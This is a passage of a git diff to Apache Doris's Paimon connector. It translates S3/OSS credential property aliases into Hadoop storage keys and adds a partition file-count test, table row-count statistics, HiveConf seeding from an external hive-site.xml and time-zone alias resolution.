b/fe/fe-connector/fe-connector-api/src/test/java/org/apache/doris/connector/api/ConnectorPartitionInfoTest.java new file mode 100644 index 00000000000000..fb79235d2ae73c --- /dev/null +++ b/fe/fe-connector/fe-connector-api/src/test/java/org/apache/doris/connector/api/ConnectorPartitionInfoTest.java @@ -0,0 +1,77 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.connector.api; + +import org.junit.jupiter.api.Assertions; +import org.junit.jupiter.api.Test; + +import java.util.Collections; + +/** + * Value-type tests for {@link ConnectorPartitionInfo}, pinning the {@code fileCount} field added for + * the paimon SHOW PARTITIONS 5-column parity (D-045). + * + *

    {@code fileCount} is the carrier for the legacy FileCount column. Because the class relies on + * value-based {@code equals}/{@code hashCode}, the field must be threaded through the 7-arg + * constructor, the getter, AND equals/hashCode — a common place to forget one.

    + */ +public class ConnectorPartitionInfoTest { + + @Test + public void sevenArgCtorCarriesFileCount() { + ConnectorPartitionInfo info = new ConnectorPartitionInfo( + "p1", Collections.emptyMap(), Collections.emptyMap(), + /*rowCount*/ 42L, /*sizeBytes*/ 1024L, /*lastModifiedMillis*/ 1700000000000L, + /*fileCount*/ 7L); + // WHY: SHOW PARTITIONS' FileCount column reads getFileCount(); it must return the 7th ctor + // arg, not be confused with rowCount/sizeBytes/lastModifiedMillis. MUTATION: returning any + // other field, or dropping the assignment (-> 0) -> red. + Assertions.assertEquals(7L, info.getFileCount()); + Assertions.assertEquals(42L, info.getRowCount()); + Assertions.assertEquals(1024L, info.getSizeBytes()); + Assertions.assertEquals(1700000000000L, info.getLastModifiedMillis()); + } + + @Test + public void backwardCompatCtorDefaultsFileCountToUnknown() { + ConnectorPartitionInfo info = new ConnectorPartitionInfo( + "p1", Collections.emptyMap(), Collections.emptyMap()); + // WHY: the 3-arg back-compat ctor (used by connectors without per-partition stats, e.g. + // MaxCompute) must default fileCount to the UNKNOWN sentinel, like the other numeric stats. + // MUTATION: defaulting to 0 instead of UNKNOWN -> red. + Assertions.assertEquals(ConnectorPartitionInfo.UNKNOWN, info.getFileCount()); + Assertions.assertEquals(ConnectorPartitionInfo.UNKNOWN, info.getRowCount()); + } + + @Test + public void equalsAndHashCodeIncludeFileCount() { + ConnectorPartitionInfo a = new ConnectorPartitionInfo( + "p1", Collections.emptyMap(), Collections.emptyMap(), 1L, 2L, 3L, 7L); + ConnectorPartitionInfo b = new ConnectorPartitionInfo( + "p1", Collections.emptyMap(), Collections.emptyMap(), 1L, 2L, 3L, 7L); + ConnectorPartitionInfo differByFileCount = new ConnectorPartitionInfo( + "p1", Collections.emptyMap(), Collections.emptyMap(), 1L, 2L, 3L, 8L); + + Assertions.assertEquals(a, b); + Assertions.assertEquals(a.hashCode(), b.hashCode()); + // WHY: value equality must distinguish on fileCount, or two partitions differing only in + // file count would be (wrongly) treated as equal. MUTATION: omitting fileCount from + // equals()/hashCode() -> a.equals(differByFileCount) -> red. + Assertions.assertNotEquals(a, differByFileCount); + } +} diff --git a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonCatalogFactory.java b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonCatalogFactory.java index 5a590e659c6029..86c303ce23cbf2 100644 --- a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonCatalogFactory.java +++ b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonCatalogFactory.java @@ -77,6 +77,41 @@ public final class PaimonCatalogFactory { /** Hadoop S3A standard prefix (legacy {@code AbstractPaimonProperties.FS_S3A_PREFIX}). */ private static final String FS_S3A_PREFIX = "fs.s3a."; + // Canonical Doris storage aliases (ported from fe-core S3Properties / OSSProperties + // @ConnectorProperty names), listed in legacy priority order. Kept as literal strings to avoid + // importing fe-core StorageProperties. Added by FIX-STORAGE-CREDS: before this, a catalog + // created with the DOCUMENTED canonical keys (s3.access_key / oss.access_key / AWS_*) had every + // credential silently dropped by applyStorageConfig (only paimon.* / raw fs.* were recognized), + // so a private S3/OSS bucket was hit with no credentials. These are translated to the Hadoop + // fs.s3a.* / fs.oss.* keys the live FileIO actually reads. + private static final String[] S3_ACCESS_KEY_ALIASES = { + "s3.access_key", "AWS_ACCESS_KEY", "access_key", "ACCESS_KEY", "s3.access-key-id"}; + private static final String[] S3_SECRET_KEY_ALIASES = { + "s3.secret_key", "AWS_SECRET_KEY", "secret_key", "SECRET_KEY", "s3.secret-access-key"}; + private static final String[] S3_SESSION_TOKEN_ALIASES = { + "s3.session_token", "session_token", "s3.session-token", "AWS_TOKEN"}; + private static final String[] S3_ENDPOINT_ALIASES = { + "s3.endpoint", "AWS_ENDPOINT", "endpoint", "ENDPOINT"}; + private static final String[] S3_REGION_ALIASES = { + "s3.region", "AWS_REGION", "region", "REGION"}; + + private static final String[] OSS_ACCESS_KEY_ALIASES = { + "oss.access_key", "fs.oss.accessKeyId", "dlf.access_key"}; + private static final String[] OSS_SECRET_KEY_ALIASES = { + "oss.secret_key", "fs.oss.accessKeySecret", "dlf.secret_key"}; + private static final String[] OSS_SESSION_TOKEN_ALIASES = { + "oss.session_token", "fs.oss.securityToken"}; + private static final String[] OSS_ENDPOINT_ALIASES = { + "oss.endpoint", "fs.oss.endpoint"}; + private static final String[] OSS_REGION_ALIASES = {"oss.region", "dlf.region"}; + + private static final String S3A_IMPL = "org.apache.hadoop.fs.s3a.S3AFileSystem"; + private static final String S3A_SIMPLE_CRED_PROVIDER = + "org.apache.hadoop.fs.s3a.SimpleAWSCredentialsProvider"; + // JindoOSS impls (literals; avoid the Aliyun compile dep, same pattern as appendDlfOptions). + private static final String JINDO_OSS_IMPL = "com.aliyun.jindodata.oss.JindoOssFileSystem"; + private static final String JINDO_OSS_ABSTRACT_IMPL = "com.aliyun.jindodata.oss.JindoOSS"; + private PaimonCatalogFactory() { } @@ -304,6 +339,10 @@ private static void appendDlfOptions(Options options) { * .normalizeS3Config()/appendUserHadoopConfig()} with a fe-core-free port: * *
      + *
    • canonical {@code s3.*}/{@code AWS_*} and {@code oss.*}/{@code fs.oss.*}/{@code dlf.*} + * aliases are translated to {@code fs.s3a.*} / Jindo {@code fs.oss.*} (ported legacy + * {@code appendS3HdfsProperties} + {@code OSSProperties.initializeHadoopStorageConfig}; + * see {@link #applyStorageConfig});
    • *
    • {@code paimon.s3.*} / {@code paimon.s3a.*} / {@code paimon.fs.s3.*} / {@code paimon.fs.oss.*} * are normalized to the Hadoop S3A prefix {@code fs.s3a.} (strip the matched prefix, * re-key as {@code fs.s3a.} + remainder), matching legacy {@code normalizeS3Config};
    • @@ -320,12 +359,24 @@ public static Configuration buildHadoopConfiguration(Map props) } /** - * Applies the normalized storage config (S3 normalization + raw fs./dfs./hadoop. passthrough) - * via the given setter. Shared by {@link #buildHadoopConfiguration} and the HiveConf builders - * (which overlay the same storage config onto the HiveConf, mirroring legacy - * {@code appendUserHadoopConfig(hiveConf)} + {@code ossProps.getHadoopStorageConfig()}). + * Applies the normalized storage config via the given setter. Shared by + * {@link #buildHadoopConfiguration} and the HiveConf builders (which overlay the same storage + * config onto the HiveConf, mirroring legacy {@code appendUserHadoopConfig(hiveConf)} + + * {@code ossProps.getHadoopStorageConfig()}). Three steps, in legacy precedence order: + * + *
        + *
      1. canonical {@code s3.*}/{@code AWS_*} aliases -> {@code fs.s3a.*} (ported legacy + * {@code AbstractS3CompatibleProperties.appendS3HdfsProperties}, credential subset);
      2. + *
      3. canonical {@code oss.*}/{@code fs.oss.*}/{@code dlf.*} aliases -> Jindo {@code fs.oss.*} + * (ported legacy {@code OSSProperties.initializeHadoopStorageConfig});
      4. + *
      5. the original {@code paimon.s3./s3a./fs.s3./fs.oss.} re-key + raw {@code fs./dfs./hadoop.} + * passthrough, which run LAST and overlay the canonical translation (last-write-wins = + * legacy {@code addResource(getHadoopStorageConfig())} then {@code appendUserHadoopConfig}).
      6. + *
      */ private static void applyStorageConfig(Map props, BiConsumer setter) { + applyCanonicalS3Config(props, setter); + applyCanonicalOssConfig(props, setter); props.forEach((key, value) -> { for (String prefix : USER_STORAGE_PREFIXES) { if (key.startsWith(prefix)) { @@ -339,6 +390,79 @@ private static void applyStorageConfig(Map props, BiConsumer props, BiConsumer setter) { + String ak = firstNonBlank(props, S3_ACCESS_KEY_ALIASES); + String sk = firstNonBlank(props, S3_SECRET_KEY_ALIASES); + String endpoint = firstNonBlank(props, S3_ENDPOINT_ALIASES); + String region = firstNonBlank(props, S3_REGION_ALIASES); + String token = firstNonBlank(props, S3_SESSION_TOKEN_ALIASES); + // Only emit S3A config when the user actually configured an S3-style storage key. + if (ak == null && endpoint == null && region == null) { + return; + } + setter.accept("fs.s3.impl", S3A_IMPL); + setter.accept("fs.s3a.impl", S3A_IMPL); + setter.accept("fs.s3.impl.disable.cache", "true"); + setter.accept("fs.s3a.impl.disable.cache", "true"); + if (StringUtils.isNotBlank(endpoint)) { + setter.accept("fs.s3a.endpoint", endpoint); + } + if (StringUtils.isNotBlank(region)) { + setter.accept("fs.s3a.endpoint.region", region); + } + if (StringUtils.isNotBlank(ak)) { + setter.accept("fs.s3a.aws.credentials.provider", S3A_SIMPLE_CRED_PROVIDER); + setter.accept("fs.s3a.access.key", ak); + setter.accept("fs.s3a.secret.key", nullToEmpty(sk)); + if (StringUtils.isNotBlank(token)) { + setter.accept("fs.s3a.session.token", token); + } + } + } + + /** + * Translates the canonical {@code oss.*}/{@code fs.oss.*}/{@code dlf.*} credential aliases into + * the Jindo {@code fs.oss.*} keys the live OSS FileIO reads. Port of legacy + * {@code OSSProperties.initializeHadoopStorageConfig} OSS block. Detection keys off OSS-specific + * aliases only (NOT {@code s3.*}), so a pure-{@code s3.*} catalog does not trigger the Jindo + * block (it is an S3 catalog, covered by {@link #applyCanonicalS3Config}); a pure-{@code oss.*} + * catalog triggers this block. + */ + private static void applyCanonicalOssConfig(Map props, BiConsumer setter) { + String ak = firstNonBlank(props, OSS_ACCESS_KEY_ALIASES); + String sk = firstNonBlank(props, OSS_SECRET_KEY_ALIASES); + String endpoint = firstNonBlank(props, OSS_ENDPOINT_ALIASES); + String region = firstNonBlank(props, OSS_REGION_ALIASES); + String token = firstNonBlank(props, OSS_SESSION_TOKEN_ALIASES); + if (ak == null && endpoint == null && region == null) { + return; + } + setter.accept("fs.oss.impl", JINDO_OSS_IMPL); + setter.accept("fs.AbstractFileSystem.oss.impl", JINDO_OSS_ABSTRACT_IMPL); + if (StringUtils.isNotBlank(ak)) { + setter.accept("fs.oss.accessKeyId", ak); + setter.accept("fs.oss.accessKeySecret", nullToEmpty(sk)); + } + if (StringUtils.isNotBlank(token)) { + setter.accept("fs.oss.securityToken", token); + } + if (StringUtils.isNotBlank(endpoint)) { + setter.accept("fs.oss.endpoint", endpoint); + } + if (StringUtils.isNotBlank(region)) { + setter.accept("fs.oss.region", region); + } + } + /** * Builds the {@link HiveConf} for the {@code hms} flavor, reconstructed from the raw property * map. Replaces fe-core {@code HMSBaseProperties.getHiveConf()} minimally: sets all {@code hive.*} @@ -352,16 +476,33 @@ private static void applyStorageConfig(Map props, BiConsumerPURE: depends only on {@code props}. + *

      PURE: depends only on {@code props} (and the pre-resolved file keys in the overload). */ public static HiveConf buildHmsHiveConf(Map props) { + return buildHmsHiveConf(props, java.util.Collections.emptyMap()); + } + + /** + * As {@link #buildHmsHiveConf(Map)}, but seeds {@code hiveConfResources} (the pre-resolved + * key/values of an external {@code hive.conf.resources} hive-site.xml, loaded FE-side via + * {@code ConnectorContext.loadHiveConfResources}) as the {@code HiveConf} BASE, BEFORE the user + * {@code hive.*} overrides — matching legacy {@code HMSBaseProperties.checkAndInit} precedence + * (file is base, user {@code hive.*} and the resolved uri win). PURE: depends only on the two maps. + */ + public static HiveConf buildHmsHiveConf(Map props, Map hiveConfResources) { HiveConf hiveConf = new HiveConf(); + // External hive-site.xml (hive.conf.resources) as the BASE (legacy checkAndInit loads the + // file first); the user hive.* keys below then correctly OVERRIDE it. + if (hiveConfResources != null) { + hiveConfResources.forEach(hiveConf::set); + } // All user-supplied hive.* keys verbatim (legacy initUserHiveConfig). props.forEach((k, v) -> { if (k.startsWith("hive.")) { @@ -486,6 +627,17 @@ public static HiveConf buildDlfHiveConf(Map props) { hiveConf.set("dlf.catalog.proxyMode", proxyMode); // Overlay the OSS storage config (legacy ossProps.getHadoopStorageConfig + appendUserHadoopConfig). applyStorageConfig(props, hiveConf::set); + // DLF parity: when the user supplied only a region (no explicit oss.endpoint), derive the OSS + // storage endpoint from it, mirroring legacy OSSProperties.getOssEndpoint(region, accessPublic). + // DLF users typically pass dlf.region/oss.region, not oss.endpoint. Kept DLF-local (not in the + // shared applyCanonicalOssConfig, which the filesystem flavor requires an explicit endpoint for). + if (StringUtils.isBlank(hiveConf.get("fs.oss.endpoint"))) { + String ossRegion = firstNonBlank(props, OSS_REGION_ALIASES); + if (StringUtils.isNotBlank(ossRegion)) { + hiveConf.set("fs.oss.endpoint", "oss-" + ossRegion + + (BooleanUtils.toBoolean(accessPublic) ? "" : "-internal") + ".aliyuncs.com"); + } + } return hiveConf; } diff --git a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonCatalogOps.java b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonCatalogOps.java index e3e062936ecbca..c44ffd0d54cf7a 100644 --- a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonCatalogOps.java +++ b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonCatalogOps.java @@ -27,6 +27,7 @@ import org.apache.paimon.table.DataTable; import org.apache.paimon.table.FileStoreTable; import org.apache.paimon.table.Table; +import org.apache.paimon.table.source.Split; import org.apache.paimon.tag.Tag; import org.apache.paimon.types.DataField; @@ -144,6 +145,16 @@ void dropTable(Identifier identifier, boolean ignoreIfNotExists) */ boolean branchExists(Table table, String branchName); + /** + * Returns the total row count of {@code table} = sum of {@code split.rowCount()} over + * {@code table.newReadBuilder().newScan().plan().splits()} (legacy + * {@code PaimonExternalTable.fetchRowCount} / {@code PaimonSysExternalTable.fetchRowCount}). + * Returns a plain {@code long} (never a paimon {@code Split} list) so the metadata layer's + * >0-else-UNKNOWN logic is unit-testable offline with {@code RecordingPaimonCatalogOps} + * ({@code FakePaimonTable.newReadBuilder()} throws). + */ + long rowCount(Table table); + void close() throws Exception; /** @@ -325,6 +336,17 @@ public boolean branchExists(Table table, String branchName) { return ((FileStoreTable) table).branchManager().branchExists(branchName); } + @Override + public long rowCount(Table table) { + // Legacy PaimonExternalTable.fetchRowCount / PaimonSysExternalTable.fetchRowCount: sum + // the planned-split record counts. + long rowCount = 0; + for (Split split : table.newReadBuilder().newScan().plan().splits()) { + rowCount += split.rowCount(); + } + return rowCount; + } + @Override public void close() throws Exception { catalog.close(); diff --git a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonConnector.java b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonConnector.java index 213ff9139bc0e2..7a7148db29698d 100644 --- a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonConnector.java +++ b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonConnector.java @@ -91,7 +91,7 @@ public ConnectorMetadata getMetadata(ConnectorSession session) { @Override public ConnectorScanPlanProvider getScanPlanProvider() { return new PaimonScanPlanProvider(properties, - new PaimonCatalogOps.CatalogBackedPaimonCatalogOps(ensureCatalog())); + new PaimonCatalogOps.CatalogBackedPaimonCatalogOps(ensureCatalog()), context); } /** @@ -104,7 +104,10 @@ public ConnectorScanPlanProvider getScanPlanProvider() { public Set getCapabilities() { return EnumSet.of( ConnectorCapability.SUPPORTS_MVCC_SNAPSHOT, - ConnectorCapability.SUPPORTS_TIME_TRAVEL); + ConnectorCapability.SUPPORTS_TIME_TRAVEL, + // Paimon exposes per-partition stats (record/size/file count) via listPartitions, + // so SHOW PARTITIONS renders the legacy 5-column result (D-045). + ConnectorCapability.SUPPORTS_PARTITION_STATS); } private Catalog ensureCatalog() { @@ -152,7 +155,13 @@ private Catalog createCatalog() { // that a real HMS-backed metastore=hive paimon catalog created through the plugin // throws neither NoClassDefFoundError (.../IMetaStoreClient) nor a Configuration/ // HiveConf LinkageError/ClassCastException. - HiveConf hc = PaimonCatalogFactory.buildHmsHiveConf(properties); + // FIX-HMS-CONFRES: resolve an external hive-site.xml (hive.conf.resources) FE-side + // (the connector cannot import fe-core/fe-common's CatalogConfigFileUtils), then seed + // its keys as the HiveConf BASE so connection-critical settings present only in that + // file reach the live metastore client (legacy HMSBaseProperties parity). + Map hiveConfFiles = context.loadHiveConfResources( + PaimonCatalogFactory.firstNonBlank(properties, "hive.conf.resources")); + HiveConf hc = PaimonCatalogFactory.buildHmsHiveConf(properties, hiveConfFiles); return createCatalogFromContext(CatalogContext.create(options, hc), flavor, "Failed to create Paimon catalog with HMS metastore"); } diff --git a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonConnectorMetadata.java b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonConnectorMetadata.java index 388fbf00ab8852..861b787e42d7c6 100644 --- a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonConnectorMetadata.java +++ b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonConnectorMetadata.java @@ -22,6 +22,7 @@ import org.apache.doris.connector.api.ConnectorPartitionInfo; import org.apache.doris.connector.api.ConnectorSession; import org.apache.doris.connector.api.ConnectorTableSchema; +import org.apache.doris.connector.api.ConnectorTableStatistics; import org.apache.doris.connector.api.ConnectorType; import org.apache.doris.connector.api.DorisConnectorException; import org.apache.doris.connector.api.ddl.ConnectorCreateTableRequest; @@ -42,6 +43,7 @@ import org.apache.paimon.catalog.Identifier; import org.apache.paimon.partition.Partition; import org.apache.paimon.schema.Schema; +import org.apache.paimon.table.DataTable; import org.apache.paimon.table.Table; import org.apache.paimon.table.system.SystemTableLoader; import org.apache.paimon.types.DataField; @@ -155,6 +157,7 @@ public ConnectorTableSchema getTableSchema( // table. Sharing buildTableSchema with the at-snapshot path keeps the two from drifting. return buildTableSchema( paimonHandle.getTableName(), + table, table.rowType().getFields(), paimonHandle.getPartitionKeys(), table.primaryKeys()); @@ -188,6 +191,7 @@ public ConnectorTableSchema getTableSchema( catalogOps.schemaAt(table, snapshot.getSchemaId()); return buildTableSchema( paimonHandle.getTableName(), + table, schema.fields(), schema.partitionKeys(), schema.primaryKeys()); @@ -199,11 +203,26 @@ public ConnectorTableSchema getTableSchema( * out so the latest path and the at-snapshot path ({@link #getTableSchema(ConnectorSession, * ConnectorTableHandle, ConnectorMvccSnapshot)}) share ONE mapping and cannot drift. */ - private ConnectorTableSchema buildTableSchema(String tableName, List fields, + private ConnectorTableSchema buildTableSchema(String tableName, Table table, List fields, List partitionKeys, List primaryKeys) { List columns = mapFields(fields, primaryKeys); - Map schemaProps = new HashMap<>(); + // LinkedHashMap so the table-options order (used by SHOW CREATE TABLE's PROPERTIES) is + // deterministic across runs. + Map schemaProps = new LinkedHashMap<>(); + // D-046: surface the paimon table options (path, file.format, write-only, ...) so SHOW + // CREATE TABLE can render LOCATION + PROPERTIES with legacy parity. Mirrors legacy + // PaimonExternalTable.getTableProperties() = coreOptions().toMap() (+ injected primary-key). + // System tables are not DataTable (legacy getTableProperties returns empty for them), so + // the coreOptions() / "path" surface is guarded the same way. "path" is already a key inside + // coreOptions().toMap(), which the fe-core LOCATION render reads. These are plain string keys + // (no fe-core dependency); the fe-core consumer filters out the schema-control keys below. + if (table instanceof DataTable) { + schemaProps.putAll(((DataTable) table).coreOptions().toMap()); + if (primaryKeys != null && !primaryKeys.isEmpty()) { + schemaProps.put(CoreOptions.PRIMARY_KEY.key(), String.join(",", primaryKeys)); + } + } if (partitionKeys != null && !partitionKeys.isEmpty()) { // Emit "partition_columns" (NOT "partition_keys"): the generic fe-core consumer // PluginDrivenExternalTable.initSchema reads "partition_columns" — keying it under @@ -485,6 +504,30 @@ public Optional resolveTimeTravel( } } + /** + * Doris session time-zone alias map, replicated from fe-core + * {@code TimeUtils.timeZoneAliasMap} (TimeUtils.java:106-117). The connector cannot import + * fe-core, so the map is rebuilt here byte-for-byte: {@link java.time.ZoneId#SHORT_IDS} (the + * JDK-provided short ids, which is where "PST"/"EST" resolve) overlaid with the four Doris + * overrides (CST/PRC -> Asia/Shanghai, UTC/GMT -> UTC). Case-insensitive, exactly like + * legacy, because {@code SET time_zone} stores the alias verbatim in any case. + * + *

      NOTE (FIX-TZ-ALIAS): the full {@code SHORT_IDS} map is required, NOT just the 4 explicit + * overrides — PST and EST resolve via {@code SHORT_IDS}, so a 4-entry-only map would still + * reject them (verified by JDK harness). + */ + private static final Map SESSION_TIME_ZONE_ALIASES; + + static { + Map m = new java.util.TreeMap<>(String.CASE_INSENSITIVE_ORDER); + m.putAll(java.time.ZoneId.SHORT_IDS); + m.put("CST", "Asia/Shanghai"); + m.put("PRC", "Asia/Shanghai"); + m.put("UTC", "UTC"); + m.put("GMT", "UTC"); + SESSION_TIME_ZONE_ALIASES = Collections.unmodifiableMap(m); + } + /** * Derives epoch-millis from a {@code TIMESTAMP} spec, byte-faithful to legacy * {@code PaimonUtil.getPaimonSnapshotByTimestamp}: a digital value is {@code Long.parseLong}; @@ -493,19 +536,19 @@ public Optional resolveTimeTravel( * *

      BYTE-PARITY TZ DECISION: legacy passed {@code TimeUtils.getTimeZone()} = * {@code TimeZone.getTimeZone(ZoneId.of(sessionTz, dorisAliasMap))}. The connector cannot import - * the fe-core Doris alias map, so it derives the zone from {@link ConnectorSession#getTimeZone()} - * via {@code TimeZone.getTimeZone(ZoneId.of(tz))} — identical to legacy for every standard zone - * id (e.g. "Asia/Shanghai", "UTC"). + * the fe-core Doris alias map, so it replicates it as {@link #SESSION_TIME_ZONE_ALIASES} and + * resolves the zone via {@code ZoneId.of(tz, SESSION_TIME_ZONE_ALIASES)} — byte-identical to + * legacy {@code TimeUtils.getTimeZone()} for every id legacy accepted (standard IANA ids, + * offsets, the {@code SHORT_IDS} aliases like "PST"/"EST", and the Doris overrides + * CST/PRC/UTC/GMT). * - *

      FAIL-LOUD on unsupported alias (NOT silent degrade): time-travel is STRICTER than predicate - * pushdown. Doris-specific aliases that {@link java.time.ZoneId#of} rejects (e.g. "CST", "PST", - * "EST") are a KNOWN LIMITATION for datetime-string time-travel — the connector cannot import the - * fe-core alias map to resolve them. Rather than silently falling back to another zone (a wrong - * zone would resolve the WRONG snapshot -> silently wrong rows), such an alias is rejected with a - * clear, actionable {@link DorisConnectorException}. (This deliberately does NOT follow the - * MaxComputePredicateConverter pattern of degrading to NO_PREDICATE on a bad alias: that is safe - * only because BE re-applies the predicate, whereas a mis-resolved time-travel zone has no such - * safety net.) The legacy {@code millis < 0} guard is preserved. + *

      FAIL-LOUD on genuinely-unknown id (NOT silent degrade): an id absent from BOTH + * {@code ZoneId.of}'s native set AND the alias map (e.g. "XYZ", "NOPE/ZZZ") is rejected with a + * clear, actionable {@link DorisConnectorException}, never silently degraded to a wrong zone (a + * wrong zone resolves the WRONG snapshot -> silently wrong rows). (This deliberately does NOT + * follow the MaxComputePredicateConverter pattern of degrading to NO_PREDICATE on a bad alias: + * that is safe only because BE re-applies the predicate, whereas a mis-resolved time-travel zone + * has no such safety net.) The legacy {@code millis < 0} guard is preserved. */ private long parseTimestampMillis(ConnectorSession session, ConnectorTimeTravelSpec spec) { String value = spec.getStringValue(); @@ -513,13 +556,14 @@ private long parseTimestampMillis(ConnectorSession session, ConnectorTimeTravelS return Long.parseLong(value); } // Resolve the session zone ONLY inside this catch so a legitimate - // DateTimeUtils.parseTimestampData("can't parse time") below is NOT swallowed: an unsupported - // Doris-alias zone (e.g. "CST"/"PST", which ZoneId.of rejects with a DateTimeException) must + // DateTimeUtils.parseTimestampData("can't parse time") below is NOT swallowed: a genuinely + // unknown zone id (absent from ZoneId.of's native set AND the replicated alias map) must // fail loud with actionable guidance, never silently degrade to a wrong zone (a wrong zone - // selects the WRONG snapshot -> silently wrong rows). + // selects the WRONG snapshot -> silently wrong rows). The alias map resolves every id legacy + // accepted (CST/PST/EST/... via SHORT_IDS + the 4 Doris overrides). java.time.ZoneId zoneId; try { - zoneId = java.time.ZoneId.of(session.getTimeZone()); + zoneId = java.time.ZoneId.of(session.getTimeZone(), SESSION_TIME_ZONE_ALIASES); } catch (java.time.DateTimeException e) { throw new DorisConnectorException( "session time zone '" + session.getTimeZone() + "' is not a standard zone id and " @@ -894,11 +938,40 @@ private List collectPartitions(PaimonTableHandle paimonH Collections.emptyMap(), partition.recordCount(), partition.fileSizeInBytes(), - partition.lastFileCreationTime())); + partition.lastFileCreationTime(), + partition.fileCount())); } return result; } + /** + * Returns the base-table row count = sum of planned-split row counts (legacy + * {@code PaimonExternalTable.fetchRowCount}: {@code rowCount > 0 ? rowCount : UNKNOWN}). Shared + * by normal AND system paimon tables: fe-core {@code PluginDrivenSysExternalTable} inherits + * {@code PluginDrivenExternalTable.fetchRowCount}, and {@link #resolveTable} is sys-aware, so a + * sys handle plans its OWN synthetic table's splits (closes Finding 5.1 with one override). + * Returns {@code Optional.empty()} (→ fe-core -1 / UNKNOWN) when the count is 0 (legacy parity) + * or planning fails (best-effort, like the other connector read paths — stats run in background + * analysis / SHOW and must not surface a transient remote error as a query-killing exception). + * {@code dataSize} is left UNKNOWN (-1): legacy computed no base-table dataSize here. + */ + @Override + public Optional getTableStatistics( + ConnectorSession session, ConnectorTableHandle handle) { + PaimonTableHandle paimonHandle = (PaimonTableHandle) handle; + long rowCount; + try { + rowCount = catalogOps.rowCount(resolveTable(paimonHandle)); + } catch (Exception e) { + LOG.warn("Failed to compute Paimon row count for {}", paimonHandle, e); + return Optional.empty(); + } + if (rowCount > 0) { + return Optional.of(new ConnectorTableStatistics(rowCount, -1)); + } + return Optional.empty(); // 0 rows -> UNKNOWN, legacy parity + } + /** * Resolves the live {@link Table} for a handle: prefer the transient reference, else re-load * from the catalog seam. Delegates to the single sys-aware {@link PaimonTableResolver} shared @@ -923,7 +996,14 @@ private List mapFields(List fields, List pri ConnectorType connectorType = PaimonTypeMapping.toConnectorType( field.type(), typeMappingOptions); String comment = field.description(); - boolean nullable = field.type().isNullable(); + // Legacy parity (FIX-READ-NOTNULL): PaimonExternalTable / PaimonSysExternalTable always + // built each Doris column with isAllowNull=true regardless of the paimon field's NOT NULL + // flag. Paimon PK columns are always NOT NULL, so propagating that would flip nullability + // metadata for almost every PK table and let nereids fold null-rejecting predicates the + // legacy path never permitted (rows can still read as NULL under schema-evolution + // default-fill). Keep columns nullable; do not propagate the paimon NOT NULL constraint + // on the read path. + boolean nullable = true; columns.add(new ConnectorColumn( field.name().toLowerCase(), connectorType, diff --git a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonScanPlanProvider.java b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonScanPlanProvider.java index 47c15bf14871ed..1f7739657ae873 100644 --- a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonScanPlanProvider.java +++ b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonScanPlanProvider.java @@ -23,6 +23,7 @@ import org.apache.doris.connector.api.pushdown.ConnectorExpression; import org.apache.doris.connector.api.scan.ConnectorScanPlanProvider; import org.apache.doris.connector.api.scan.ConnectorScanRange; +import org.apache.doris.connector.spi.ConnectorContext; import org.apache.doris.thrift.TFileScanRangeParams; import com.fasterxml.jackson.core.type.TypeReference; @@ -32,7 +33,12 @@ import org.apache.paimon.CoreOptions; import org.apache.paimon.catalog.Identifier; import org.apache.paimon.data.BinaryRow; +import org.apache.paimon.data.Timestamp; +import org.apache.paimon.fs.FileIO; import org.apache.paimon.io.DataFileMeta; +import org.apache.paimon.io.DataOutputViewStreamWrapper; +import org.apache.paimon.rest.RESTToken; +import org.apache.paimon.rest.RESTTokenFileIO; import org.apache.paimon.table.FileStoreTable; import org.apache.paimon.table.Table; import org.apache.paimon.table.source.DataSplit; @@ -41,17 +47,24 @@ import org.apache.paimon.table.source.ReadBuilder; import org.apache.paimon.table.source.Split; import org.apache.paimon.table.source.TableScan; +import org.apache.paimon.types.DataType; import org.apache.paimon.types.RowType; import org.apache.paimon.utils.InstantiationUtil; import org.apache.paimon.utils.RowDataToObjectArrayConverter; +import java.io.ByteArrayOutputStream; import java.nio.charset.StandardCharsets; +import java.time.LocalDate; +import java.time.LocalTime; +import java.time.ZoneId; +import java.time.format.DateTimeFormatter; import java.util.ArrayList; import java.util.Base64; import java.util.Collections; import java.util.HashMap; import java.util.LinkedHashMap; import java.util.List; +import java.util.Locale; import java.util.Map; import java.util.Optional; import java.util.stream.Collectors; @@ -98,12 +111,37 @@ public class PaimonScanPlanProvider implements ConnectorScanPlanProvider { private static final TypeReference> MAP_TYPE_REF = new TypeReference>() {}; + // 